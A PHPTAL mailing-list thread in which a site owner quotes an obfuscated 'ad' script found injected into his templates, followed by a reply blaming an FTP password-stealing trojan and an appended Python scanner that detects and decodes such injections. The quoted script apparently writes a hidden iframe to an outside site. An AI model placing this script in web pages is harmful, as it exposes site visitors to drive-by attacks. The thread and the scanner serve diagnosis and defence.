Szymek Przybył <apocalyp...@...> writes:

> 
> I have done a few sites in PHPTAL. When I visited one of them today, I saw an 
> error:
> 
> exception 'PHPTAL_Exception' with message 'Invalid element name 
> 'ohhe.length;qhxk+=3){ifdm+=rkfg(ohhe.substr'' in 
> /inc/PHPTAL-1.1.14/PHPTAL/Dom/Node.php:107 Stack trace: # etc...
> 
> When I checked the code, I found an add-on in the main template (main.html), after 
> <body>:
> 
> <!-- ad --><script language="JavaScript">function rkfg(jflq){return 
> String.fromCharCode(jflq);}var
> ohhe="06010510211409710910103211511409906103910411611611205804704711511711210111
> 41051111140971001220461051101021110471111121051150470631160610490510390321191051
> 00116104061039048039032104101105103104116061039048039032115116121108101061039118
> 10511510509810510810511612105803210410510010010111005903906206004710510211409710
> 9101062";var 
> ifdm="";for(qhxk=0;qhxk<ohhe.length;qhxk+=3){ifdm+=rkfg(ohhe.substr 
> (qhxk, 3));}window.status='Done';document.write(ifdm);</script>
> <!-- /ad -->
> 
> I also found it in files called home.html (home page template) and 
> index.html. Sometimes this code appears at the end of the file. This isn't a 
> server fault - I checked a page which I also wrote in PHPTAL, which is on 
> the other server - and there was the same add-on code ;|
> 
> Does anybody know why this code may have appeared? Maybe someone found some 
> security bug in PHPTAL?
> 
> This code also appears in an index.html file, which I don't use in PHPTAL.
> 
> cheers!
> szymek
> 


Read this forum thread: http://www.webhostingtalk.com/showthread.php?t=757762
This sounds like an FTP trojan that acquired your passwords, thus the posting 
on both of your sites.






_______________________________________________
PHPTAL mailing list
PHPTAL@lists.motion-twin.com
http://lists.motion-twin.com/mailman/listinfo/phptal
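
A defensive check for the kind of injection described in this thread, as an added example that is not part of the original messages or of PHPTAL: it flags `<script>` blocks that combine `String.fromCharCode` and `document.write` with a long all-digit string, and decodes the digits for review without executing them. The function names, the 30-digit threshold, the file suffixes and the sample template are assumptions; the sample is constructed and hides only harmless text.

```python
import re
from pathlib import Path

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
DIGITS_RE = re.compile(r"[\"'](\d{30,})[\"']")  # threshold is an assumption


def decode_triplets(digits):
    """Turn 3-digit decimal character codes into text; nothing is executed."""
    return "".join(chr(int(digits[i:i + 3])) for i in range(0, len(digits) - 2, 3))


def find_injections(text):
    """Return (script_offset, decoded_text) for each suspicious script block."""
    findings = []
    for m in SCRIPT_RE.finditer(text):
        body = re.sub(r"\s+", "", m.group(1))  # undo line wrapping inside the string
        if "String.fromCharCode" in body and "document.write" in body:
            for d in DIGITS_RE.finditer(body):
                findings.append((m.start(), decode_triplets(d.group(1))))
    return findings


def scan_tree(root, suffixes=(".html", ".htm", ".php", ".tpl")):
    """Scan template-like files under root; return {path: findings} for hits only."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = find_injections(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits


# Constructed sample: same shape as the injected block, harmless hidden text.
SAMPLE_HIDDEN = "<b>constructed sample</b>"
SAMPLE_TEMPLATE = (
    '<html><body>\n<!-- ad --><script language="JavaScript">'
    'function f(c){return String.fromCharCode(c);}var s="'
    + "".join(f"{ord(c):03d}" for c in SAMPLE_HIDDEN)
    + '";var o="";for(i=0;i<s.length;i+=3){o+=f(s.substr(i,3));}'
    'document.write(o);</script><!-- /ad -->\n<h1 tal:content="title">x</h1>'
    "</body></html>"
)
CLEAN_TEMPLATE = '<html><body><script>document.write("hello");</script></body></html>'

if __name__ == "__main__":
    for offset, decoded in find_injections(SAMPLE_TEMPLATE):
        print(f"script at offset {offset} writes: {decoded!r}")
```

Run `scan_tree` over a local copy of each site's document root; a hit shows which files were modified and what markup the hidden script would write into the page.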
